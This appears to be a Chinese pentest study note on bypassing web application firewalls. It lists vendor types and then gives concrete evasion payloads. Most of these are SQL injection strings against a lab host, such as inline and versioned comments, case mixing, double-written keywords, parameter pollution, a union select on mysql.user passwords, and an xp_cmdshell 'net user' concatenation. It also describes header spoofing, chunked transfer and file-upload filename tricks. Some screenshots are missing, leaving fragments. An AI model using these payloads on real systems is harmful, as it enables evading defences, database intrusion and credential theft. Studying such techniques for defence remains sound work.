• waf绕过


    1.市场Waf分类
      

    硬件Waf:绿盟、安恒、启明、知道创宇等
            需要选择模式
            透明模式
            反向代理分为反向代理(代理模式)与反向代理(牵引模式)
            反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)
            旁路监控
    软件Waf:安全狗、云锁、中间件自带的Waf模块
    云WAF:阿里云、安全狗、知道创宇、安恒

    2.WAF的检测方法
      

    首先白名单黑名单身份认证--数据包解析--规则判断--拦截     

       

    3.身份认证阶段绕过
        

    • 伪造搜索引擎绕过

            

    •  伪造白名单的特殊目录

            admin/../  方式绕过
            http://10.0.0.139:92/pikachu/pkxss/admin/../pkxss_login.php
             

    4.数据包解析绕过
      

    •  1、burp安装waf模块

    WAF绕过方法:伪造XFF头为127.0.0.1或找出真实IP绕过 
     安装插件
              

         

                  加一些路径
                                                    

    • 2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
    •  3、编码url绕过

      输入and 1=1


    将and换位&&


    进行url编码
                     

     

     去掉1=1


    将1=1换位-1=-1


        4、修改请求方式绕过:利用waf的默认规则绕过,如默认只针对拦截,不对post拦截
            对方支持request
           为request就是可以


              

    •  5、复合参数绕过

            http://10.0.0.139:92/sql.php?id=1&id=and&id=1=2

    •     6、WAF触发规则的绕过

       内联注释代替空格/**/代替空格
         http://10.0.0.139:92/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-1


    特殊字符拼接
                例如: exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
    注释包含关键字
                /*!*/包含关键词
                    GET /pen/news.php?id=1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
                and /*!1*/=/*!1*/ #
                    加!是被执行
                Lucy' order /*!11440 by*/ 1,2#
                    跟这个数字有关,这是一个版本
                -1'  union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#
    使用大小写
                http://www.***.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
    双写绕过
                http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
    关键字替换
                xor异或绕过
                mod绕过
                = | like|in、group_concat() | concat_ws()、@@version | version()
    利用WAF本身的功能绕过利用*代替空格
                ,如uni*on+sel*ect+1,2,3,4....
    组合法
                and /*!1=1*/ %23
                把and为&&,urlencode后为%26%26  如:%20%26%26%20-1=-2

    •     7、分块传输绕过

     支持get 或request
      变更请求方法


     使用分块传输


     0代表传输完成

    • 8.利用其他变量或命令执行语句

          and mod(8,7) in (1)
          and mod(8,7) in (2)
           异或运算(测注入点)xor
                vince ' Xor '1'='1' #
                vince ' Xor '1'='2' #     

    5.文件上传绕过
        

    • 方法一:等号绕过

            被waf拦截


     上传成功
                    

    •     方法二:换行绕过

    •     方法三:填充垃圾字符

            在from-data前加一些垃圾字符
                

    •     方法四:突破0,文件名前缀加[0x09]绕过

    •         方法五:文件名去掉双引号绕过

    6.XSS绕过Waf
      

    • HTML5 新标签

            
            


              

              audio标签